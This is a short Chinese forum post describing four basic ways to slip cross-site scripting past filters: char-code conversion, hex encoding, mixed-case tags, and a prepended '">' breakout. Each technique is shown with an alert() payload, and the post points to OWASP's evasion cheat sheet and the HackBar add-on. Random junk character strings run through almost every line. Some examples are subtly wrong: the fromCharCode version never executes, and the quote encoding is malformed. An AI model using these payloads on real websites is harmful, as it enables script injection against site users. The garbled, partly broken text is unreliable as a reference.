四种超级基础的绕过方法。
9 i( S" M+ b8 F' e; l1 N; C) G1.转换为ASCII码8 X+ H' d, R/ l D+ y- \/ _
例子:原脚本为<script>alert(‘I love F4ck’)</script >7 k1 p' S- H ]3 s6 w4 h7 t
通过转换,变成:6 _+ Y$ E J% k0 X
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
# f" r4 Z+ M. j, T: B - `6 m) ~( q) k5 q9 W
2.转换为HEX(十六进制)& h; D M& Z+ _; v: n
例子:原脚本为<script>alert(‘I love F4ck’)</script>
& X0 ]/ ?& f* i; @" P, b3 E通过转换,变成:* { \+ v4 _) p
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
* b2 f4 \3 j( m# ], ]% V " Y! e% O( h/ N s/ s& |: v
3.转换脚本的大小写. X3 [) s( M/ E/ t( J
例子:原脚本为<script>alert(‘I love F4ck’)</script>1 d3 O8 w* N* P( R: p4 \6 i
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
9 O3 c9 m4 P8 ~9 B
' [8 k' U( G* Y! {# v) s" Q4.增加闭合标记”>0 ?4 }5 S |8 }9 q% Q* K
例子:原脚本为<script>alert(‘I love F4ck’)</script>) H1 }/ f- @( a1 K
转换为:”><script>alert(‘I love F4ck’)</script>* P- L/ ^+ h6 r3 d' n4 Q$ Y$ C
更详细绕过技术请参考此网页
6 g2 ~$ B7 p6 r% [# p) v( shttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet- j+ x& E- q, q4 X- J( `6 M
# @5 P+ [ P$ N1 b/ |* h! h转换工具使用的是火狐的 hackbar mozilla addon. |